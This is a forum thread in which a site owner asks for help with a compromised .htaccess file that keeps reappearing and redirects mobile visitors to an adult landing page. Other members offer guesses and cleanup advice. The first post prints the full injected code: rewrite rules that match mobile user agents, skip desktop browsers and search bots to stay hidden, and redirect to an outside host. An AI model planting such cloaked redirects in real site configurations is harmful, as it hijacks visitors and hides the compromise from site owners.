1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

help wierd virus has doinate all my sites

Discussion in 'Blogging' started by Bestcreaters, Dec 19, 2014.

  1. Bestcreaters

    Bestcreaters Power Member

    Joined:
    Jul 10, 2013
    Messages:
    618
    Likes Received:
    270
    Occupation:
    money maker
    Location:
    Making Money is important
    Code:
    RewriteEngine on
    
    RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu900|lg210|lg47|lg920|lg840|lg370|sam-r|mg50|s55|g83|t66|vx400|mk99|d615|d763|el370|sl900|mp500|samu3|samu4|vx10|xda_|samu5|samu6|samu7|samu9|a615|b832|m881|s920|n210|s700|c-810|_h797|mob-x|sk16d|848b|mowser|s580|r800|471x|v120|rim8|c500foma:|160x|x160|480x|x640|t503|w839|i250|sprint|w398samr810|m5252|c7100|mt126|x225|s5330|s820|htil-g1|fly\ v71|s302|-x113|novarra|k610i|-three|8325rc|8352rc|sanyo|vx54|c888|nx250|n120|mtk\ |c5588|s710|t880|c5005|i;458x|p404i|s210|c5100|teleca|s940|c500|s590|foma|samsu|vx8|vx9|a1000|_mms|myx|a700|gu1100|bc831|e300|ems100|me701|me702m-three|sd588|s800|8325rc|ac831|mw200|brew\ |d88|htc\/|htc_touch|355x|m50|km100|d736|p-9521|telco|sl74|ktouch|m4u\/|me702|8325rc|kddi|phone|lg\ |sonyericsson|samsung|240x|x320|vx10|nokia|sony\ cmd|motorola|up.browser|up.link|mmp|symbian|smartphone|midp|wap|vodafone|o2|pocket|mobile|treo) [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a\ wa|acer|acs-|airn|alav|asus|attw|au-m|aur\ |aus\ |abac|acoo|aiko|alco|alca|amoi|anex|anny|anyw|aptu|arch|argo|bell|bird|bw-n|bw-u|beck|benq|bilb|blac|c55\/|cdm-|chtm|capi|cond|craw|dall|dbte|dc-s|dica|ds-d|ds12|dait|devi|dmob|doco|dopo|el49|erk0|esl8|ez40|ez60|ez70|ezos|ezze|elai|emul|eric|ezwa|fake|fly-|fly_|g-mo|g1\ u|g560|gf-5|grun|gene|go\.w|good|grad|hcit|hd-m|hd-p|hd-t|hei-|hp\ i|hpip|hs-c|htc\ |htc-|htca|htcg|htcp|htcs|htct|htc_|haie|hita|huaw|hutc|i-20|i-go|i-ma|i230|iac|iac-|iac\/|ig01|im1k|inno|iris|jata|java|kddi|kgt|kgt\/|kpt\ |kwc-|klon|lexi|lg\ g|lg-a|lg-b|lg-c|lg-d|lg-f|lg-g|lg-k|lg-l|lg-m|lg-o|lg-p|lg-s|lg-t|lg-u|lg-w|lg\/k|lg\/l|lg\/u|lg50|lg54|lge-|lge\/|lynx|leno|m1-w|m3ga|m50\/|maui|mc01|mc21|mcca|medi|meri|mio8|mioa|mo01|mo02|mode|modo|mot\ |mot-|mt50|mtp1|mtv\ |mate|maxo|merc|mits|mobi|motv|mozz|n100|n101|n102|n202|n203|n300|n302|n500|n502|n505|n700|n701|n710|nec-|nem-|newg|neon|netf|noki|nzph|o2\ x|o2-x|opwv|owg1|opti|oran|p800|pand|pg-1|pg-2|pg-3|pg-6|pg-8|pg-c|pg13|phil|pn-2|pt-g|palm|pana|pire|pock|pose|psio|qa-a|qc-2|qc-3|qc-5|qc-7|qc07|qc12|qc21|qc32|qc60|qci-|qwap|qtek|r380|r600|raks|rim9|rove|s55\/|sage|sams|sc01|sch-|scp-|sdk\/|se47|sec-|sec0|sec1|semc|sgh-|shar|sie-|sk-0|sl45|slid|smb3|smt5|sp01|sph-|spv\ |spv-|sy01|samm|sany|sava|scoo|send|siem|smar|smit|soft|sony|t-mo|t218|t250|t600|t610|t618|tcl-|tdg-|telm|tim-|ts70|tsm-|tsm3|tsm5|tx-9|tagt|talk|teli|topl|hiba|up\.b|upg1|utst|v400|v750|veri|vk-v|vk40|vk50|vk52|vk53|vm40|vx98|virg|vite|voda|vulc|w3c\ |w3c-|wapj|wapp|wapu|wapm|wig\ |wapi|wapr|wapv|wapy|wapa|waps|wapt|winc|winw|wonu|x700|xda2|xdag|yas-|your|zte-|zeto|acs-|alav|alca|amoi|aste|audi|avan|benq|bird|blac|blaz|brew|brvw|bumb|ccwa|cell|cldc|cmd-|dang|doco|eml2|eric|fetc|hipt|http|ibro|idea|ikom|inno|ipaq|jbro|jemu|java|jigs|kddi|keji|kyoc|kyok|leno|lg-c|lg-d|lg-g|lge-|libw|m-cr|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|mywa|nec-|newt|nok6|noki|o2im|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|rozo|sage|sama|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|treo|tsm-|upg1|upsi|vk-v|voda|vx52|vx53|vx60|vx61|vx70|vx80|vx81|vx83|vx85|wap-|wapa|wapi|wapp|wapr|webc|whit|winw|wmlb|xda-) [NC,OR]
    RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
    RewriteCond %{HTTP:Profile} .+ [NC,OR]
    RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
    RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
    RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
    RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]
    
    
    RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleWebKit\/533\.1\ \(KHTML,\ like\ Gecko\)\ Version\/4\.0\ Mobile\ Safari\/533\.1\ offline)$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]
    
    
    RewriteRule ^(.*)$ http://share-with-me.info/ [L,R=302]
    RewriteEngine On 
    RewriteCond %{SERVER_PORT} 80 
    RewriteRule ^(.*)$ https://www.mywebite.com/$1 [R,L]
    all my sites are redirecting to http://share-with-me.info a porn landing page and the code is in htaccess and i deleted all the site files and started afress but it regenerate a new httacess with the same virus code every single day i even changed to new host but the same thing happen i have clean all suspecious files but notting what sould i do viwers discrition is adviced the following url redirect to a porn site please only visit it if your willing to analyze it in solving this problem willing to and i have alterd my website link in www.mywebsite.com for privacy and no am not using wordpress on most of my sites
     
  2. Zwielicht

    Zwielicht Moderator Staff Member Moderator Jr. VIP

    Joined:
    Aug 31, 2013
    Messages:
    6,573
    Likes Received:
    11,721
    Gender:
    Male
    Occupation:
    Private Investigator
    Location:
    Riverside, California
    Home Page:
    You should put the warning before the link, not after it. Someone might get excited and click on it without reading the rest of your post.

    [​IMG]

    Anyway, so you said that you've tried deleting the entire website and changing the domain to start over, but every time you regenrate a new .htaccess file, the file is reinfected. I have a few questions for you:


    1. How long have you been having this problem?
    2. Where did you download your version of Wordpress?
    3. Have you contacted your host to see if your server is infected?

    Edit: I reread the original post and OP said that they already tried switching to a new host. Anyway, when you try to remove the code I highlighted below, does it just reappear?

    Code:
    [COLOR=#ff0000]RewriteRule ^(.*)$ http://share-with-me.info/ [L,R=302][/COLOR]
    RewriteEngine On 
    RewriteCond %{SERVER_PORT} 80 
    RewriteRule ^(.*)$ https://www.mywebite.com/$1 [R,L]
    
     
    Last edited: Dec 19, 2014
  3. peepin2me

    peepin2me Regular Member

    Joined:
    Mar 4, 2010
    Messages:
    321
    Likes Received:
    105
    Location:
    Singapore
    Wow. This sounds scary. Did you raise a ticket with your host? The tech support guys with most hosts are quite good and are usually able to identify the issue and suggest ways to fix it.
     
  4. Bestcreaters

    Bestcreaters Power Member

    Joined:
    Jul 10, 2013
    Messages:
    618
    Likes Received:
    270
    Occupation:
    money maker
    Location:
    Making Money is important
    yes it does reapper and one very scary thing that shock me was i added an addon domain on my server for one of my client to set up and work on a clone version of his site immediately after i finsh working which tok like 4 hours i copied the files to his website and i day later his site got hijacked the same way now is is treatning too sue me of course he wont belive i have ntting to do with it could the hacker be using shell? i check some stats to my traffic and i saw a constant visitor from russia but i blocked that ip changed my password no ftp accunts not secnd user my host claim that am the only one on that server with the problem but notting i am so scared to be honest
     
  5. onnelbro86

    onnelbro86 Junior Member

    Joined:
    Nov 18, 2014
    Messages:
    153
    Likes Received:
    6
    was wondering, what attacker motif
     
  6. Bestcreaters

    Bestcreaters Power Member

    Joined:
    Jul 10, 2013
    Messages:
    618
    Likes Received:
    270
    Occupation:
    money maker
    Location:
    Making Money is important
    can u sppeak english please
     
  7. moromete

    moromete Junior Member

    Joined:
    Jul 19, 2008
    Messages:
    183
    Likes Received:
    151
    My guess is that you have installed a nulled module/plugin that can overwrite the htaccess file. Am I right ?
     
  8. Zwielicht

    Zwielicht Moderator Staff Member Moderator Jr. VIP

    Joined:
    Aug 31, 2013
    Messages:
    6,573
    Likes Received:
    11,721
    Gender:
    Male
    Occupation:
    Private Investigator
    Location:
    Riverside, California
    Home Page:
    I'm not entirely sure what it is then. The best advice I can offer you right now is to start a "new" Wordpress website on a different host/server and install your SQL database and 1 file at a time until you find the problem file.
    He means, "I was wondering, what is the attacker's motive?".
     
  9. Bestcreaters

    Bestcreaters Power Member

    Joined:
    Jul 10, 2013
    Messages:
    618
    Likes Received:
    270
    Occupation:
    money maker
    Location:
    Making Money is important
    to earn from the cpa landing page of curse
     
  10. SharkServers

    SharkServers Jr. VIP Jr. VIP

    Joined:
    Jun 29, 2014
    Messages:
    406
    Likes Received:
    194
    Occupation:
    Web Hosting
    Location:
    DMCA? Pff! www.SuckMyBallsDM.CA
    Home Page:
    First of all - is this a shared hosting account, or a VPS? That does make a difference, so it's good to know in order to try and help you. If it's a VPS, try putting each domain on a separate user account, clean the sites, and then see on which account the problem reappears. That way you will be able to identify the script that has security issues.
     
  11. bartosimpsonio

    bartosimpsonio Jr. VIP Jr. VIP Premium Member

    Joined:
    Mar 21, 2013
    Messages:
    12,040
    Likes Received:
    10,829
    Occupation:
    WHEREZ MA
    Location:
    BITCOINS AT?
    Home Page:
    Your server has been compromised. Trash it and move your site to a new one, this server will be forever compromised.
     
    • Thanks Thanks x 1